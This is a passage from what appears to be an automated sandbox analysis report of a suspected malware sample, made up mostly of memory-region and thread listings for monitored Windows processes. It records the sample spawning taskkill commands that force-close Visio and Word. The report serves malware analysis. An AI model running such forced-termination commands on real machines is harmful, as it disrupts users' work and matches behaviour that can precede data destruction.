0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3418 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3419 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3420 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3421 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3422 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3423 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3424 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3425 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3426 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3427 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3428 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3429 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3430 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3431 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3432 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 3433 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 3434 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 3435 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Thread: id = 262 os_tid = 0xcd0 Thread: id = 302 os_tid = 0xdc0 Thread: id = 313 os_tid = 0xe08 Thread: id = 318 os_tid = 0xe1c Thread: id = 319 os_tid = 0xe20 Process: id = "39" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x7097a000" os_pid = "0xcec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM visio.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2911 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2912 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2913 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2914 start_va = 0x190000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 2915 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2916 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2917 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2918 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 2919 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2920 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2921 start_va = 0x7fffffd4000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 2922 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 2923 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 2924 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2925 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3310 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3311 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 3312 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3313 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 3314 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 3315 start_va = 0xe0000 end_va = 0xe3fff entry_point = 0xe0000 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\System32\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskkill.exe.mui") Region: id = 3316 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 3317 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 3318 start_va = 0x110000 end_va = 0x110fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 3319 start_va = 0x120000 end_va = 0x120fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 3320 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 3321 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 3322 start_va = 0x4c0000 end_va = 0x57ffff entry_point = 0x4c0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 3323 start_va = 0x590000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 3324 start_va = 0x5a0000 end_va = 0x727fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 3325 start_va = 0x730000 end_va = 0x8b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000730000" filename = "" Region: id = 3326 start_va = 0x8c0000 end_va = 0x1cbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 3327 start_va = 0x1d40000 end_va = 0x1dbffff entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 3328 start_va = 0x1e10000 end_va = 0x1e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e10000" filename = "" Region: id = 3329 start_va = 0x1f40000 end_va = 0x1fbffff entry_point = 0x0 region_type = private name = "private_0x0000000001f40000" filename = "" Region: id = 3330 start_va = 0x2000000 end_va = 0x207ffff entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 3331 start_va = 0x20f0000 end_va = 0x216ffff entry_point = 0x0 region_type = private name = "private_0x00000000020f0000" filename = "" Region: id = 3332 start_va = 0x2170000 end_va = 0x243efff entry_point = 0x2170000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3333 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3334 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3335 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3336 start_va = 0x7fef4590000 end_va = 0x7fef46b4fff entry_point = 0x7fef4590000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 3337 start_va = 0x7fef7320000 end_va = 0x7fef732efff entry_point = 0x7fef7320000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 3338 start_va = 0x7fef7490000 end_va = 0x7fef7515fff entry_point = 0x7fef7490000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 3339 start_va = 0x7fef8c90000 end_va = 0x7fef8cdbfff entry_point = 0x7fef8c90000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 3340 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 3341 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 3342 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 3343 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 3344 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 3345 start_va = 0x7fefc780000 end_va = 0x7fefc78bfff entry_point = 0x7fefc780000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 3346 start_va = 0x7fefcbb0000 end_va = 0x7fefcbf6fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3347 start_va = 0x7fefceb0000 end_va = 0x7fefcec6fff entry_point = 0x7fefceb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3348 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 3349 start_va = 0x7fefd450000 end_va = 0x7fefd45afff entry_point = 0x7fefd450000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 3350 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3351 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3352 start_va = 0x7fefd560000 end_va = 0x7fefd59cfff entry_point = 0x7fefd560000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 3353 start_va = 0x7fefd5a0000 end_va = 0x7fefd5b3fff entry_point = 0x7fefd5a0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 3354 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3355 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3356 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3357 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3358 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3359 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3360 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3361 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3362 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3363 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3364 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3365 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3366 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3367 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3368 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3369 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 3370 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 3371 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 3372 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Thread: id = 265 os_tid = 0xcf0 Thread: id = 298 os_tid = 0xdac Thread: id = 311 os_tid = 0xe00 Thread: id = 315 os_tid = 0xe10 Thread: id = 316 os_tid = 0xe14 Process: id = "40" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x70699000" os_pid = "0xd28" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM winword.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3058 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3059 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3060 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3061 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 3062 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3063 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3064 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3065 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 3066 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3067 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3068 start_va = 0x7fffffdb000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 3069 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 3070 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3071 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3072 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3466 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3467 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 3468 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 3469 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 3470 start_va = 0x70000 end_va = 0x73fff entry_point = 0x70000 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\System32\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskkill.exe.mui") Region: id = 3471 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 3472 start_va = 0x90000 end_va = 0x90fff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 3473 start_va = 0x1a0000 end_va = 0x206fff entry_point = 0x1a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3474 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 3475 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3476 start_va = 0x320000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 3477 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 3478 start_va = 0x430000 end_va = 0x5b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 3479 start_va = 0x5c0000 end_va = 0x740fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 3480 start_va = 0x750000 end_va = 0x1b4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 3481 start_va = 0x1b50000 end_va = 0x1c0ffff entry_point = 0x1b50000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 3482 start_va = 0x1c40000 end_va = 0x1cbffff entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 3483 start_va = 0x1e00000 end_va = 0x1e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 3484 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3485 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3486 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3487 start_va = 0x7fef4590000 end_va = 0x7fef46b4fff entry_point = 0x7fef4590000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 3488 start_va = 0x7fef8c90000 end_va = 0x7fef8cdbfff entry_point = 0x7fef8c90000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 3489 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 3490 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 3491 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 3492 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 3493 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 3494 start_va = 0x7fefc780000 end_va = 0x7fefc78bfff entry_point = 0x7fefc780000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id 